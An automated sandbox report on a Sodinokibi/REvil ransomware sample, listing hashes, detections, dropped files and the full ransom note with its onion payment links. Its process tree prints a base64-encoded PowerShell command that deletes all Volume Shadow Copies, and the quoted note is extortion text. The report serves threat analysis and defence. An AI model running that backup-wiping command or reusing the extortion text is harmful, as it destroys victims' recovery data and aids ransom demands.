Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20240802-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    10-09-2024 17:31

General

  • Target

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Malware Config

Extracted

Path

C:\Users\3805xd4j-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3805xd4j. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE655257CD8F4ABD 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/EE655257CD8F4ABD Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: 14yIEPlx6c+xr/NT7OT0lZ8z7O+ZJXKB8SFee1FfR5MBx5tUftJOuqnMGIFq+qkR hFnqtVTKt1zMQnoQ7gvE/9qmPLrIcg0GT8oV2NFpjdD7FY0dU9tg4uBvtw4Ki7VP l7MrSOozcLTTMWuaUn7k9Zuv48slKsALWFSelkDVCeYaw6xlZXBcM57fJq2r7XAQ zB+aGH6Aw6Y2OrXJzWgWcQ6P1dCVXp+ZX1uGjScFyTpmYK/+m+h6Fyzj4/jUpa5h MXrdEbszATP2lSFjdvVPmaByY/+VzxSJiJ4abcRnKEud0M66/sFVHtn4DrdvD74d XIrWXPs9DveTIR0VE/xKuF11r/f4axWXAIrJ/E2vPZ+fs/t4cyVtwB/IuTeRslAE RjhUlJpSIuRq0JsOEYbYXuDW2Qmmkn7fMRf3S2xxkXxuKglsYEUBZPOf0iRfruzO fMN4D6ve0nHS4518t4SCRHkcNtPXJbP5Y5tFl4Dyn2MT0GUpAC1QOv767FFDFIIm ORROxl36kyOHOvYQ58ZaX61NHPt1uFQxn+Boe1GqhFpnnniEtsA7/0jxlkj6l15x i2+Tl5P+8D/UibaayFSFGfjN8QfOo3sRn/k9Zw2F3aXLHVfEmDWxWBwsq6jwmgKC Fys3etwDcdqUXTc/ry/StE1h85jYKKEm0b/6186Ay7nD3BRE+FJAnJ6wym8uPuBI TlnyCWNvJc5aWu+xDOHkV+VO3K5mU+Z+oawvQpAt1ZSqLmmD5XXSAwMtF1HmaKtD +SuZlg238ivxQSMSanwzpbde4bCSrV0ERUqVxCRhSgNt0ot012z/rWAUE8GdzfYi EVJHxhtEEwKMKK3waxtDX/wORavyWadi8rH/qx4n9I5tPjpgIHtFmOTqxa4f0z1r 572wLdQ7aR9LZIoedOd2L5dsURdIn5pc8VyQzj6zqAI5oCGzYKI2FO/+7tq3vxlh 3pCdzJ8xCcux9MnINvGoj9UbffJ4wSVk3KwLExuBUi4iAyPy2uZeuDck3fmNLQr0 2GkvPgJpXSSpLbZFsXubzANw40CU4N51jdvEvY+GEhNYb2i3ZEoBAqJvic0XygXB Ov/uFg52sb1Wl5UzVmYwAMWHLqRSHvms9w6lgK6m4ZZddKiQ3VCzjLaWZ+f4A3k5 IQ8TpDWCH4sj4+DD8AluUT9b6CIRuBUhm8RpTeKJ3iWfQ5vHn7Hg4BzKPNE7ooIX KULKFvFm1QxpWZqYEZcDW16vBXuB/EEGZ5bkUbkcEqeOoKju71bTHWFSP+LIeUqu 0YwSaSQr7o2nokCrvCJY4ulgeATDjXrSmKkj6vW62NhrjcE6ffin6RftLhtvXqg0 FEGLl7E5xxnj9gmsIxVXr3t7oquMcE51dzCoeZ80YKenaC1cr6SyVd/U ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE655257CD8F4ABD

http://decryptor.cc/EE655257CD8F4ABD

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 26 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe
    "C:\Users\Admin\AppData\Local\Temp\14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:544
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:320
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5072

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\3805xd4j-readme.txt

    Filesize

    7KB

    MD5

    39c16baccbb3428f1f8ee4de464ded58

    SHA1

    5d798fb2cee065a11319cb7d63481df95c56b9b3

    SHA256

    03236c9e543578af29e436843726c245be78807d36fbdebf274edad3e4ab1002

    SHA512

    c15c8b21c0e95344a5cffeae0de74f9db27830286d66a5496685f4bf6278ab91d27982c905d907fecf0b35ec4cd6ccaf1d83b5e8bd43fcc774af46b736554fe4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isoxyaug.rj1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/544-0-0x00007FFAA6343000-0x00007FFAA6345000-memory.dmp

    Filesize

    8KB

  • memory/544-2-0x0000014A9B090000-0x0000014A9B0B2000-memory.dmp

    Filesize

    136KB

  • memory/544-11-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

    Filesize

    10.8MB

  • memory/544-12-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

    Filesize

    10.8MB

  • memory/544-15-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

    Filesize

    10.8MB